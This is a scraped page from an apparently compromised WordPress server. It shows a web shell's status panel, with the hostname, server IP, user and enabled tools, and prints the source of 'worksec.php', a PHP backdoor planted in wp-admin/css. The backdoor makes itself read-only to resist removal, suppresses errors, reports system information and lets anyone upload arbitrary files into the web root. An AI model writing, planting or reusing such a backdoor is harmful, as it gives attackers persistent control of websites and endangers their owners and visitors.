Uname:Linux srv.e-maxmedia.com 4.18.0-553.109.1.el8_10.x86_64 #1 SMP Mon Mar 2 09:33:18 EST 2026 x86_64

Base Dir : /home/thegold/public_html

User : thegold


403WebShell
403Webshell
Server IP : 185.185.82.2  /  Your IP : 216.73.217.18
Web Server : Apache/2.4.65 (Unix) OpenSSL/1.1.1k
System : Linux srv.e-maxmedia.com 4.18.0-553.109.1.el8_10.x86_64 #1 SMP Mon Mar 2 09:33:18 EST 2026 x86_64
User : thegold ( 1094)
PHP Version : 8.3.4
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/thread-self/cwd/wp-admin/css/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/thread-self/cwd/wp-admin/css/worksec.php
<?php

// Path to the file
$file = 'worksec.php';

// Change the file permissions to 0444 (read-only)
chmod($file, 0444);

?>
<?php

error_reporting(0);
set_time_limit(0);
$user = get_current_user();

echo "<center><b>Uname:".php_uname()."<br></b>"; 
echo "<br><b>Base Dir : ".getcwd()."<br></b>";
echo "<br><b>User : ".$user."<br></b>";
echo '<br><font color="black" size="4">';
if(isset($_POST['Submit'])){
    $filedir = ""; 
    $maxfile = '2000000';
    $mode = '0644';
    $userfile_name = $_FILES['image']['name'];
    $userfile_tmp = $_FILES['image']['tmp_name'];
    if(isset($_FILES['image']['name'])) {
        $qx = $filedir.$userfile_name;
        @move_uploaded_file($userfile_tmp, $qx);
        @chmod ($qx, octdec($mode));
	echo" <a href=$userfile_name><center><b>Sucessfully Uploaded :D ==> $userfile_name</b></center></a>";
	}
}else{
	echo'<form method="POST" action="#" enctype="multipart/form-data"><input type="file" name="image"><br><input type="Submit" name="Submit" value="Upload"></form>';
}
echo '</center></font>';

?>

Youez - 2016 - github.com/yon3zu
LinuXploit